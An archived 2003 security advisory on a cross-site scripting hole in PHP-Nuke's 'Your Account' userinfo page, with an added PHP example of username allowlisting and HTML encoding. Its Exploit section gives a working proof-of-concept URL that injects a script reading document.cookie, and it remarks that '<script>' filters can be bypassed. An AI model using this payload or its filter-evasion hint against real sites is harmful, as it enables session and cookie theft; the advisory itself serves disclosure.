Securityvulns: SECURITYVULNS:DOC:4523
May 14, 2003 - 12:00 a.m.

PHPNuke "Your Account" XSS Vulnerability



Vulnerable;

Francisco Burzi PHP-Nuke 6.5 Final Release


Not tested, but 90% likely vulnerable;

Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5


About PHPNuke;

PHP Based Content Management System
http://www.phpnuke.org


Solution;

A simple string check or user check should be OK!
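
One way to implement the "simple string check" above, shown as an added example that is not part of the original advisory and is not PHP-Nuke code. The function names and the username policy (letters, digits, "_" and "-", at most 25 characters) are assumptions; the "user check" (looking the name up in the user table) is not shown.

```php
<?php
// Added example, not PHP-Nuke code. Function names and the username
// policy (letters, digits, "_" and "-", at most 25 chars) are assumptions.

/**
 * "Simple string check": accept only names matching an allowlist.
 * Returns the name on success, null on rejection.
 */
function checked_username($raw): ?string
{
    if (!is_string($raw)) {          // ?username[]=x arrives as an array
        return null;
    }
    // \A...\z anchors the whole string; "$" alone would allow a trailing newline.
    return preg_match('/\A[A-Za-z0-9_-]{1,25}\z/', $raw) === 1 ? $raw : null;
}

/** Encode for an HTML text or quoted-attribute context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the fragment a userinfo page would emit for this request. */
function render_userinfo(array $query): string
{
    $name = checked_username($query['username'] ?? null);
    if ($name === null) {
        // Do not echo the rejected value back, even encoded.
        return '<p>Invalid user name.</p>';
    }
    // Encode at output anyway: the check and the sink can drift apart.
    return '<h2>Profile of ' . h($name) . '</h2>';
}

// Constructed requests; the second carries the advisory's test string.
$samples = [
    ['username' => 'ferruh'],
    ['username' => 'bla<script>alert(document.cookie)</script>'],
    ['username' => ['x']],
];
foreach ($samples as $q) {
    echo render_userinfo($q), PHP_EOL;
}
// What encoding alone does to the same string (shown for comparison):
echo h('bla<script>alert(document.cookie)</script>'), PHP_EOL;
```

The allowlist decides what a user name may contain instead of searching the input for known-bad strings, so it does not depend on recognising any particular tag.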


Exploit;

http://[victim]/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>

*You may need to log in first.
**Some servers/PHP-Nuke systems have a security check for "<script>"
strings in query strings or POST variables (i.e. www.phpnuke.org). But these
systems are still vulnerable. You can skip these controls with some JS
tricks.

Ferruh Mavituna
Freelance Developer & Designer
http://ferruh.mavituna.com